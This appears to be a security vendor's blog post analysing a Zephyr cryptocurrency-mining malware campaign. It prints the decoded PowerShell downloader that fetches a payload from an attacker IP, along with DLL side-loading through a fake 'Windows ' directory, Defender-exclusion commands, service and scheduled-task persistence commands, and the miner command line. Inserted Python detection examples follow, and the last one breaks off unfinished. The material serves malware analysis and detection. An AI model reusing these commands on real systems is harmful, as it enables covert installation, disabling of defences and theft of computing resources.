{"id":93017,"date":"2024-12-02T20:45:15","date_gmt":"2024-12-02T15:15:15","guid":{"rendered":"https:\/\/blogs.quickheal.com\/?p=93017"},"modified":"2026-02-02T17:53:09","modified_gmt":"2026-02-02T12:23:09","slug":"crypto-mining-malware-zephyr","status":"publish","type":"post","link":"https:\/\/www.quickheal.com\/blogs\/crypto-mining-malware-zephyr\/","title":{"rendered":"Persistence in the Shadows: A Study of Zephyr Miner Exploiting System Services"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"93017\" class=\"elementor elementor-93017\">\n\t\t\t\t\t\t\t<div class=\"elementor-element elementor-element-548b003f e-flex e-con-boxed e-con e-parent\" data-id=\"548b003f\" data-element_type=\"container\" data-settings=\"{&quot;content_width&quot;:&quot;boxed&quot;}\" data-core-v316-plus=\"true\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-65a98e00 elementor-widget elementor-widget-text-editor\" data-id=\"65a98e00\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<style>\/*! 
elementor - v3.16.0 - 17-10-2023 *\/\n.elementor-widget-text-editor.elementor-drop-cap-view-stacked .elementor-drop-cap{background-color:#69727d;color:#fff}.elementor-widget-text-editor.elementor-drop-cap-view-framed .elementor-drop-cap{color:#69727d;border:3px solid;background-color:transparent}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap{margin-top:8px}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap-letter{width:1em;height:1em}.elementor-widget-text-editor .elementor-drop-cap{float:left;text-align:center;line-height:1;font-size:50px}.elementor-widget-text-editor .elementor-drop-cap-letter{display:inline-block}<\/style>\t\t\t\t<h2><strong>Crypto Mining<\/strong><\/h2>\nCrypto mining is the process by which individuals or organizations use computing power to solve the proof-of-work puzzles that validate transactions on a blockchain network, earning cryptocurrency in return. As the value of digital currencies has risen, some malicious actors have turned to exploiting other people\u2019s devices for this work. Cybercriminals typically use phishing emails or deceptive downloads to install mining software, known as crypto mining malware or cryptojacking, without the user&#8217;s knowledge. Once installed, it drains the device&#8217;s CPU and GPU, causing slowdowns, overheating and, over time, hardware wear.\n\nThese miners usually run quietly in the background and masquerade as legitimate processes, which makes them hard to spot. They also obfuscate their code to evade security software, talk to a mining pool to receive work and submit results (the rewards are credited to the attacker&#8217;s wallet by the pool, never to the infected machine), and alter system settings to keep themselves running. 
Understanding these risks is the first step in keeping systems from being exploited and devices running efficiently.\n<h2><strong>Zephyr Coin<\/strong><\/h2>\nZephyr (ZEPH) is a privacy-focused cryptocurrency built on a fork of the Monero codebase. Like Monero, it is secured by proof-of-work using the RandomX algorithm, which is deliberately designed to be mined efficiently on ordinary CPUs rather than on GPUs or ASICs. That property is exactly what makes it attractive to cryptojackers: a fleet of infected office PCs and laptops can mine RandomX coins profitably, whereas the same hardware would earn almost nothing on GPU- or ASIC-dominated coins. As interest in the coin grows, so does the interest of cybercriminals looking to steal users\u2019 computing power, which is why users need to take extra steps to protect their resources.\n<h2><strong>Technical Details<\/strong><\/h2>\nThis variant of the malware arrives in four initial-loader formats:\n<ol>\n \t<li>Visual Basic Script &#8211; VBS<\/li>\n \t<li>Batch Processing File &#8211; BAT<\/li>\n \t<li>PowerShell Script \u2013 PS1<\/li>\n \t<li>Portable Executable &#8211; PE<\/li>\n<\/ol>\nAll four converge on the same trick: copy the legitimate, Microsoft-signed printui.exe into a look-alike directory named C:\\Windows \\System32 (note the space after \u201cWindows\u201d) together with a malicious printui.dll, and launch it.\n<h3><strong>1. Visual Basic Script \u2013 VBS execution process<\/strong><\/h3>\nThe script first checks whether a marker folder, C:\\Windows \\System32\\010101, exists. If it does not, it removes the entire look-alike directory with a PowerShell command, creates a fresh C:\\Windows \\System32, copies printui.exe into it and copies a file named x followed by six digits with a .dat extension (x\\d{6}.dat) alongside it, renaming that file to printui.dll. The choice of a path with a trailing space, C:\\Windows \\System32, is deliberate: in process listings and logs it is easily mistaken for the genuine System32 directory, while in fact it is a directory the attacker controls. 
After these actions it launches the copied printui.exe, which loads the renamed DLL from its own directory, and the chain continues from step 5 of the execution described below.\n<h3><strong>2. Batch Processing File \u2013 BAT execution description<\/strong><\/h3>\nThe script begins by setting the console code page to UTF-8 and attempts to open a random folder in the parent directory. It then checks for printui.dll in the System32 folder of the system drive. If the file is not found, it removes the look-alike &#8220;Windows &#8221; folder from the system drive with rmdir \/S \/Q, creates a new &#8220;Windows \\System32&#8221; directory and copies printui.exe from its original location into it. It also moves the x\\d{6}.dat file into the same directory, renaming it printui.dll. The script then verifies that both printui.exe and printui.dll are present: if they are, it executes printui.exe; if either is missing, it deletes the entire &#8220;Windows \\System32&#8221; folder. Once printui.exe is running, the chain continues from step 5 of the execution described below.\n<h3><strong>3. 
PowerShell Execution description:<\/strong><\/h3>\nThe PowerShell loader is a single command that carries its logic as a Base64 string and decodes it at run time:\n\npowershell -Command &#8220;$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String\n\n\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\u201d\n\n<strong>After decoding<\/strong>\n\n<code>for (;;){<\/code>\n<code>(New-Object System.Net.WebClient).DownloadFile(\"http:\/\/37.1.196.35\/un2\/botui.dat\", \"C:\\Users\\Public\\pyld.dll\");\n<\/code><code>Start-Sleep -Seconds 2;\n<\/code><code>if (Test-Path \"C:\\Users\\Public\\pyld.dll\"){\n<\/code><code>cmd \/c mkdir \"\\\\?\\C:\\Windows \\System32\";\n<\/code><code>cmd \/c xcopy \/y \"C:\\Windows\\System32\\printui.exe\" \"C:\\Windows \\System32\";\n<\/code><code>cmd \/c move \/y \"C:\\Users\\Public\\pyld.dll\" \"C:\\Windows \\System32\\printui.dll\";\n<\/code><code>Start-Sleep -Seconds 2;\n<\/code><code>Start-Process -FilePath \"C:\\Windows \\System32\\printui.exe\";\n<\/code><code>break;\n<\/code><code>}\n<\/code><code>else{ Start-Sleep -Seconds 60;\n<\/code><code>}\n<\/code><code>}<\/code>\n\nThe decoded script is a retry loop. It downloads botui.dat from hxxp[:]\/\/37.1.196.35\/un2\/botui.dat to C:\\Users\\Public\\pyld.dll and, if no file appeared, sleeps 60 seconds and tries again indefinitely. Once the file exists it creates the look-alike directory with mkdir \"\\\\?\\C:\\Windows \\System32\" (the \\\\?\\ prefix makes the Win32 API pass the path to the kernel without normalization, which is the only way to create a directory name ending in a space), copies the genuine printui.exe into it, moves the downloaded file in beside it as printui.dll, and starts printui.exe. From that point on the behaviour is identical to the executable variant from step 5 onward.\n\n<figure id=\"attachment_93024\" aria-describedby=\"caption-attachment-93024\" style=\"width: 443px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93024 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-1-Execution-Flowchart-443x390.png\" alt=\"\" width=\"443\" height=\"390\" \/><figcaption id=\"caption-attachment-93024\" class=\"wp-caption-text\">Figure 1: Execution Flowchart<\/figcaption><\/figure>\n<h3><strong>4. 
Portable Executable Format Execution process:<\/strong><\/h3>\nThe fourth delivery method is a native executable (EXE or DLL). When a user unknowingly downloads and runs it, the installation chain below is triggered.\n\nThe chain starts with either the malicious EXE (miner.exe) or the DLL whose name matches x\\d{6}.dat. Its behaviour, step by step:\n<ol>\n \t<li>On execution the malware adds a Windows Defender exclusion for the System32 folder through PowerShell (Add-MpPreference only succeeds from an elevated context):\n<ul>\n \t<li>powershell -Command &#8220;Add-MpPreference -ExclusionPath &#8216;C:\\Windows\\System32<\/li>\n<\/ul>\n<\/li>\n \t<li>It then drops usvcinsta64.exe into the System32 folder and launches it.\n\n<figure id=\"attachment_93028\" aria-describedby=\"caption-attachment-93028\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93028 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-2-usvcinsta64.exe-getting-installed-in-sys32-650x220.png\" alt=\"\" width=\"650\" height=\"220\" \/><figcaption id=\"caption-attachment-93028\" class=\"wp-caption-text\">Figure 2 usvcinsta64.exe getting installed in sys32<\/figcaption><\/figure><\/li>\n \t<li>usvcinsta64.exe adds the same exclusion again<\/li>\n<\/ol>\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>powershell -Command &#8220;Add-MpPreference -ExclusionPath &#8216;C:\\Windows\\System32&#8217;;&#8221;<\/li>\n<\/ul>\n<\/li>\n<\/ul>\nand a second one for the look-alike path with a space after Windows, &#8216;C:\\Windows \\System32&#8217;:\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>powershell -Command &#8220;Add-MpPreference -ExclusionPath &#8216;C:\\Windows \\System32&#8217;;&#8221;<\/li>\n<\/ul>\n<\/li>\n<\/ul>\nIt then creates that directory with cmd.exe \/c mkdir &#8220;\\\\?\\C:\\Windows \\System32&#8221;. The \\\\?\\ prefix is what makes this work: ordinary Win32 path handling trims a trailing space from a directory name, so without the prefix the command would simply resolve to the existing C:\\Windows. 
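The following Python is an added example, not code from the Quick Heal analysis or from the malware. It models, in simplified form, the trailing-space trimming that Win32 path handling applies, to show why a check that normalizes a path before comparing it against C:\Windows\System32 accepts the look-alike directory while a literal comparison does not, and it adds a small check for the mock-directory pattern itself. The trusted-directory set, the normalization rules and the sample paths are assumptions of the example, not Windows APIs or data from the page.

```python
"""Added example, not from the Quick Heal write-up: why a directory named
"C:\\Windows \\System32" (trailing space after Windows) passes for the real
System32 under a check that normalizes paths, and a check that is not fooled.

win32_normalize() is a simplified imitation of Win32 path handling, which
trims trailing spaces and periods from path components and is skipped for
paths carrying the \\?\ prefix. It is not a call into Windows, and the sample
paths are constructed for the demonstration.
"""
import re
from typing import List

VERBATIM_PREFIX = "\\\\?\\"           # the literal \\?\ prefix
TRUSTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}  # assumed trusted set


def _components(path: str) -> List[str]:
    return re.split(r"[\\/]+", path)


def win32_normalize(path: str) -> str:
    """Collapse separators and trim trailing spaces/periods from every component.
    A \\?\ path is returned untouched, as Windows hands it to the kernel verbatim."""
    if path.startswith(VERBATIM_PREFIX):
        return path
    return "\\".join(c.rstrip(" .") for c in _components(path))


def parent_dir(path: str) -> str:
    return path.rsplit("\\", 1)[0]


def naive_is_trusted(exe_path: str) -> bool:
    """The flawed check: normalize first, then compare the parent directory.
    "C:\\Windows \\System32\\printui.exe" normalizes to the real System32 and passes."""
    return parent_dir(win32_normalize(exe_path)).lower() in TRUSTED_DIRS


def strict_is_trusted(exe_path: str) -> bool:
    """Compare the literal parent directory. Only the \\?\ prefix is removed, so
    that both spellings of the same path compare equal; nothing else is trimmed."""
    literal = exe_path[len(VERBATIM_PREFIX):] if exe_path.startswith(VERBATIM_PREFIX) else exe_path
    return parent_dir(literal).lower() in TRUSTED_DIRS


def mock_components(path: str) -> List[str]:
    """Components ending in a space or period. NTFS accepts them, but they cannot be
    created through ordinary Win32 path handling, so their presence is a strong signal."""
    return [c for c in _components(path) if c and c != c.rstrip(" .")]


def is_suspicious_path(path: str) -> bool:
    """True for a \\?\ path or any path containing a mock component."""
    return path.startswith(VERBATIM_PREFIX) or bool(mock_components(path))


if __name__ == "__main__":
    for p in (r"C:\Windows\System32\printui.exe",
              r"C:\Windows \System32\printui.exe",
              "\\\\?\\C:\\Windows \\System32\\printui.exe"):
        print(f"{p!r:50} naive={naive_is_trusted(p)} strict={strict_is_trusted(p)} "
              f"suspicious={is_suspicious_path(p)}")
```

The naive check is the shape of the bug the mock-directory trick exploits: anything that canonicalizes before comparing collapses "Windows " into "Windows". When hunting, compare literal paths from process-creation logs and flag any component that ends in a space or period, as mock_components does.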
The result is two directories that appear to share a name: the genuine C:\\Windows and the newly created &#8220;Windows &#8221; with a trailing space, which shows the recent creation date highlighted in Figure 3.\nThis look-alike of the Windows system folder is the well-documented &#8220;mock trusted directory&#8221; technique. A Microsoft-signed system binary (here printui.exe) is copied into it beside an attacker-supplied DLL with the name the binary expects (printui.dll). Because an executable&#8217;s own directory is searched before System32 when a DLL is loaded by name, printui.exe loads the malicious printui.dll instead of the real one: DLL search order hijacking in its side-loading form. The path also survives casual inspection, since &#8220;C:\\Windows \\System32\\printui.exe&#8221; is easily mistaken for the legitimate binary in process listings and logs. Outside this sample the same trailing-space trick is best known as a UAC-bypass primitive, because the elevation service normalizes the path (dropping the space) before deciding whether an auto-elevating executable lives in a trusted directory.\n\n<figure id=\"attachment_93029\" aria-describedby=\"caption-attachment-93029\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93029 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-3-Windows-with-space-in-getting-created-in-Root-C-650x343.png\" alt=\"\" width=\"650\" height=\"343\" \/><figcaption id=\"caption-attachment-93029\" class=\"wp-caption-text\">Figure 3 &#8220;Windows &#8221; (with a trailing space) being created in the root of C:<\/figcaption><\/figure>\n\n4. As Figure 3 shows, the sample performs the common operations from steps 1 to 3 and then starts printui.exe from the directory it created (C:\\Windows \\System32):\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>cmd.exe \/c start &#8220;&#8221; &#8220;C:\\Windows \\System32\\printui.exe&#8221;<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<figure id=\"attachment_93030\" aria-describedby=\"caption-attachment-93030\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93030 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-4-Xcopying-printui.exe_-650x192.png\" alt=\"\" width=\"650\" height=\"192\" \/><figcaption id=\"caption-attachment-93030\" class=\"wp-caption-text\">Figure 4 Xcopying printui.exe<\/figcaption><\/figure>\n\n<figure id=\"attachment_93031\" aria-describedby=\"caption-attachment-93031\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93031 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-5-Starting-printui.exe_-650x216.png\" alt=\"\" width=\"650\" height=\"216\" \/><figcaption id=\"caption-attachment-93031\" class=\"wp-caption-text\">Figure 5 Starting printui.exe<\/figcaption><\/figure>\n\nThe main stage of the execution begins here.\n\n5. Once printui.exe is running with the side-loaded printui.dll, it adds Defender exclusions once more for both C:\\Windows \\System32 and C:\\Windows\\System32, then launches cmd.exe to create a service and the registry value that service needs.\n\nIt copies the .dat file into the real System32 folder and registers it as the ServiceDll of a new svchost-hosted service. The service name varies from variant to variant: it is an &#8220;x&#8221; followed by six random digits, and the DLL follows the same pattern, x\\d{6}.dat. In a live infection the service name, the Parameters key and the DLL name carry the same token, because svchost locates the DLL through HKLM\\SYSTEM\\CurrentControlSet\\Services\\&lt;name&gt;\\Parameters\\ServiceDll; the captured command below mixes two tokens (x638273 for the service, x310586 for the key and the DLL), so read it as a template rather than as one literal command line.\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>cmd.exe \/c sc create x638273 binPath= &#8220;C:\\Windows\\System32\\svchost.exe -k DcomLaunch&#8221; type= own start= auto &amp;&amp; reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\x310586\\Parameters \/v ServiceDll \/t REG_EXPAND_SZ \/d &#8220;C:\\Windows\\System32\\x310586.dat&#8221; \/f &amp;&amp; sc start x638273<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<figure id=\"attachment_93032\" aria-describedby=\"caption-attachment-93032\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93032 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-6-Random-name-generated-to-dat-file-650x139.png\" alt=\"\" width=\"650\" height=\"139\" \/><figcaption id=\"caption-attachment-93032\" class=\"wp-caption-text\">Figure 6 Random name generated for the .dat file<\/figcaption><\/figure>\n\nOnce registered, the service is started and runs inside svchost.exe; what it does there is covered in point 9.\n\n6. 
Next it starts console_zero.exe from System32:\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>cmd.exe \/c start &#8220;&#8221; &#8220;C:\\Windows\\System32\\console_zero.exe&#8221;<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n7. console_zero.exe has one job: it removes any existing scheduled task named &#8220;console_zero&#8221; and creates a new one that runs the executable with the highest available privileges (\/rl HIGHEST) every time a user logs on:\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>cmd.exe \/c schtasks \/create \/tn &#8220;console_zero&#8221; \/sc ONLOGON \/tr &#8220;C:\\Windows\\System32\\console_zero.exe&#8221; \/rl HIGHEST \/f<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n8. With persistence established in two forms, the svchost-hosted service and the logon task, the malware cleans up after itself: usvcinsta64.exe, the &#8220;Windows \\System32&#8221; look-alike directory and the original sample are all deleted, which removes the obvious traces while leaving the components that keep it running.\n\n<figure id=\"attachment_93033\" aria-describedby=\"caption-attachment-93033\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93033 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-7-Malware-self-deleting-650x134.png\" alt=\"\" width=\"650\" height=\"134\" \/><figcaption id=\"caption-attachment-93033\" class=\"wp-caption-text\">Figure 7 Malware self-deleting<\/figcaption><\/figure>\n\nThat completes the installation. The core of the malware is the service now running inside svchost.exe, which the next section examines.\n<h2><strong>Service Details<\/strong><\/h2>\n9. 
The service running inside svchost.exe adds further Windows Defender exclusions: the analysis observed exclusions for the C, D, E and F drives, and the commands captured below cover the real System32 folder and the roots of the E: and F: drives. Excluding an entire drive root disables scanning for everything on it, so an exclusion like this is a strong signal on its own; every such change is also logged by Defender as Event ID 5007 (configuration changed) in the Microsoft-Windows-Windows Defender\/Operational log, which makes it cheap to alert on.\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell -Command &#8220;Add-MpPreference -ExclusionPath &#8216;c:\\windows\\system32&#8217;;&#8221;<\/li>\n \t<li>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell -Command &#8220;Add-MpPreference -ExclusionPath &#8216;E:\\&#8217;;&#8221;<\/li>\n \t<li>C:\\Windows\\System32\\cmd.exe cmd.exe \/c powershell -Command &#8220;Add-MpPreference -ExclusionPath &#8216;F:\\&#8217;;&#8221;<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n10. It then launches cmd.exe to run the miner itself, which connects to the pool zeph.2miners.com on port 2222, authenticates with the attacker&#8217;s wallet address as the username and is capped at 50% CPU usage. The coin mined is Zephyr. The option syntax (-o, -u, --rig-id, --max-cpu-usage) is that of the open-source XMRig miner, the standard miner for RandomX coins:\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>C:\\Windows\\System32\\cmd.exe cmd.exe \/c x310586.dat -o zeph.2miners.com:2222 -u ZEPHs8rW7aS82Z52aS3qh35jPcaYKHdrufzLCCCyXmqdFC8wRPpCTdLgoA1CaqJDa72zG8ZhsMmdMZyJkqDTadbSPbwt1s2ppYr --rig-id=x421236 --max-cpu-usage=50<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<figure id=\"attachment_93035\" aria-describedby=\"caption-attachment-93035\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93035 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Wallet-ID-components-650x126.png\" alt=\"\" width=\"650\" height=\"126\" \/><figcaption id=\"caption-attachment-93035\" class=\"wp-caption-text\">Figure 8 Wallet ID components<\/figcaption><\/figure>\n<ol>\n \t<li>x310586.dat \u2013 the program launched (the same x\\d{6}.dat file that was registered as the ServiceDll)<\/li>\n \t<li>zeph.2miners.com:2222 \u2013 the pool hostname and port<\/li>\n \t<li>ZEPHs8rW7aS82Z52aS3qh35jPcaYKHdrufzLCCCyXmqdFC8wRPpCTdLgoA1CaqJDa72zG8ZhsMmdMZyJkqDTadbSPbwt1s2ppYr \u2013 the wallet address that receives the mining rewards; on a public pool this address is also the key under which the campaign&#8217;s hashrate and worker count can be looked up<\/li>\n \t<li>--rig-id \u2013 a unique identifier for the mining setup, x421236 in the command above (another capture used x419395); it follows the same x plus six digits scheme as the service name and lets the operator tell infected hosts apart on the pool dashboard<\/li>\n \t<li>--max-cpu-usage=50 \u2013 caps the miner at 50% of the CPU, which keeps the host responsive enough that the infection is less likely to be noticed<\/li>\n<\/ol>\n<h2><strong>Zephyr Wallet Details<\/strong><\/h2>\nTwo wallet addresses are associated with this campaign. The images below show the pool statistics for each address, observed while the service was running:\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>ZEPHs8rW7aS82Z52aS3qh35jPcaYKHdrufzLCCCyXmqdFC8wRPpCTdLgoA1CaqJDa72zG8ZhsMmdMZyJkqDTadbSPbwt1s2ppYr<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<figure id=\"attachment_93034\" aria-describedby=\"caption-attachment-93034\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93034 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Figure-9-Zephyr-miners-wallet-details-650x175.png\" alt=\"\" width=\"650\" height=\"175\" \/><figcaption id=\"caption-attachment-93034\" class=\"wp-caption-text\">Figure 9 Zephyr miner&#8217;s wallet details<\/figcaption><\/figure>\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>ZEPHs7Ep8zTafTpfMEduqd5xGYLEvBJwcHXRpbA92fMjVJcji9EXQsDP5QQLVxmn7UTSTFqpmaVdE2ydBwupJctU2ggmsNvqxfd<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<figure id=\"attachment_93026\" aria-describedby=\"caption-attachment-93026\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-93026 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Fgire-10-Zephyr-miners-details-for-another-wallet-ID-650x163.png\" alt=\"\" width=\"650\" height=\"163\" \/><figcaption id=\"caption-attachment-93026\" class=\"wp-caption-text\">Figure 10 Zephyr miner&#8217;s details for the second wallet address<\/figcaption><\/figure>\n<h2><strong>Summary<\/strong><\/h2>\nThis malware is a variant of a crypto miner that mines Zephyr 
coins. Unlike a bare miner, it combines several persistence and evasion techniques. The overall execution chain is:\n<ol>\n \t<li><strong>Initial Execution<\/strong>: The infection starts with a script (VBS, BAT or PowerShell) or an executable, which drives the rest of the chain through cmd.exe and PowerShell.<\/li>\n \t<li><strong>Exclusion from Windows Defender<\/strong>: The malware adds C:\\Windows\\System32 (and later the look-alike directory and whole drive roots) to Defender&#8217;s exclusion list, repeatedly, so that its dropped files are never scanned.<\/li>\n \t<li><strong>Search Order Hijacking via an additional space in the path<\/strong>: A look-alike of C:\\Windows\\System32 named &#8220;C:\\Windows \\System32&#8221; is created, and the genuine printui.exe is placed in it next to a malicious printui.dll, which it loads in place of the real library.<\/li>\n \t<li><strong>Service Creation<\/strong>: A service named x followed by six random digits (x638273 in the captured command) is created to run under svchost.exe, with its ServiceDll pointing at the malicious DLL of the same naming pattern (x310586.dat in the captured command). The miner therefore runs persistently as a service that starts automatically at boot.<\/li>\n \t<li><strong>Multiple files for multiple operations<\/strong>: usvcinsta64.exe creates &#8220;C:\\Windows \\System32&#8221; and launches cmd.exe for service creation; console_zero.exe registers the logon scheduled task.<\/li>\n \t<li><strong>Cleanup Operations<\/strong>: Finally it deletes every trace except the components needed for persistence.<\/li>\n \t<li><strong>Mining Activity<\/strong>: The service connects to the pool zeph.2miners.com:2222 and mines Zephyr to the wallet address given on the command line.<\/li>\n<\/ol>\nOverall, this chain highlights the malware&#8217;s three primary functions: evading detection, establishing a cryptocurrency mining operation, and maintaining persistence on the system. 
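As an added example that is not part of the original analysis, the Python below turns the chain summarised above into detection logic and runs it over constructed process-creation command lines modelled on the ones quoted on this page (Sysmon Event ID 1 and Security Event ID 4688 both supply the command line, so the same logic applies to either source). The sample events, the rule names and the single consistent x638273 token are constructed for the example; the only inputs taken from the page are the command-line shapes, the pool and the wallet address.

```python
"""Added example, not from the Quick Heal write-up: command-line detection rules
for each stage of the Zephyr miner chain, exercised on constructed events.
Service and file names in the samples reuse the page's x+six-digit pattern with
one consistent token; they are illustrative, not indicators from a real incident.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Case-insensitive throughout: cmd.exe, PowerShell and the registry are, and attackers vary casing.
RE_EXCLUSION = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+'([^']+)'", re.I)
RE_DRIVE_ROOT = re.compile(r"^[A-Z]:\\?$", re.I)
RE_SC_SVCHOST = re.compile(
    r'\bsc\s+create\s+(\S+)\s+binPath=\s*"[^"]*svchost\.exe\s+-k\s+(\w+)', re.I)
RE_SERVICEDLL = re.compile(
    r'\\services\\(\S+?)\\Parameters\s+/v\s+ServiceDll\s+/t\s+REG_EXPAND_SZ\s+/d\s+"([^"]+)"', re.I)
RE_LOGON_TASK = re.compile(
    r'schtasks\s+/create\b(?=.*\s/sc\s+ONLOGON\b)(?=.*\s/rl\s+HIGHEST\b).*?/tr\s+"([^"]+)"',
    re.I | re.S)
RE_MINER = re.compile(r"\s-o\s+(\S+).*?\s-u\s+(\S+)", re.I)
RE_MINER_OPT = re.compile(r"--(rig-id|max-cpu-usage)=(\S+)", re.I)
RE_VERBATIM_PREFIX = re.compile(r"\\\\\?\\")                       # literal \\?\
RE_TRAILING_SPACE_DIR = re.compile(r"[^\\\"'\s.][^\\\"']*[ .]+\\")  # "Windows \" in C:\Windows \System32


@dataclass
class Finding:
    rule: str
    detail: str


def parse_miner_args(cmdline: str) -> Optional[Dict[str, str]]:
    """Pull pool, wallet and XMRig-style options out of a miner command line.
    Requires a host:port pool and an address-length user so that unrelated tools
    taking -o and -u (curl, for instance) do not match."""
    m = RE_MINER.search(cmdline)
    if not m:
        return None
    pool, wallet = m.groups()
    if not re.search(r":\d{2,5}$", pool) or len(wallet) < 40:
        return None
    args = {"pool": pool, "wallet": wallet}
    for opt, val in RE_MINER_OPT.findall(cmdline):
        args[opt.lower()] = val
    return args


def classify(cmdline: str) -> List[Finding]:
    """Return every rule that fires on one process command line."""
    findings: List[Finding] = []

    # Steps 1, 3 and 9: Defender exclusions. System32 and drive roots are what this family adds.
    for path in RE_EXCLUSION.findall(cmdline):
        broad = bool(RE_DRIVE_ROOT.match(path)) or path.rstrip("\\").lower().endswith("system32")
        findings.append(Finding("defender_exclusion_broad" if broad else "defender_exclusion", path))

    # Steps 3 and 4: mock trusted directory, created with \\?\ or referenced with a trailing-space component.
    if RE_VERBATIM_PREFIX.search(cmdline) or RE_TRAILING_SPACE_DIR.search(cmdline):
        findings.append(Finding("mock_trusted_directory", cmdline))

    # Step 5: svchost-hosted service whose ServiceDll is not a normal DLL (here a .dat file).
    svc, dll = RE_SC_SVCHOST.search(cmdline), RE_SERVICEDLL.search(cmdline)
    if svc and dll:
        name, group = svc.groups()
        key_name, dll_path = dll.groups()
        odd = not dll_path.lower().endswith(".dll") or name.lower() != key_name.lower()
        findings.append(Finding("svchost_servicedll_suspicious" if odd else "svchost_servicedll",
                                f"service={name} group={group} servicedll={dll_path}"))

    # Step 7: logon task with the highest run level.
    task = RE_LOGON_TASK.search(cmdline)
    if task:
        findings.append(Finding("logon_task_highest", task.group(1)))

    # Step 10: the miner itself.
    miner = parse_miner_args(cmdline)
    if miner:
        findings.append(Finding("miner_cmdline", f"pool={miner['pool']} wallet={miner['wallet'][:8]}..."))
    return findings


# Constructed events modelled on the command lines in the analysis (not real log data).
SAMPLE_EVENTS = [
    ("e1", r'''powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32';"'''),
    ("e2", r'''cmd.exe /c mkdir "\\?\C:\Windows \System32"'''),
    ("e3", r'''cmd.exe /c start "" "C:\Windows \System32\printui.exe"'''),
    ("e4", r'''cmd.exe /c sc create x638273 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x638273\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x638273.dat" /f && sc start x638273'''),
    ("e5", r'''cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f'''),
    ("e6", r'''cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"'''),
    ("e7", r'''cmd.exe /c x638273.dat -o zeph.2miners.com:2222 -u ZEPHs8rW7aS82Z52aS3qh35jPcaYKHdrufzLCCCyXmqdFC8wRPpCTdLgoA1CaqJDa72zG8ZhsMmdMZyJkqDTadbSPbwt1s2ppYr --rig-id=x421236 --max-cpu-usage=50'''),
    ("e8", r'''C:\Windows\System32\svchost.exe -k netsvcs -p'''),      # benign
    ("e9", r'''"C:\Program Files\Git\bin\git.exe" status'''),          # benign
]


def scan(events) -> Dict[str, List[str]]:
    """Map each event id to the rule names that fired; events with no findings are omitted."""
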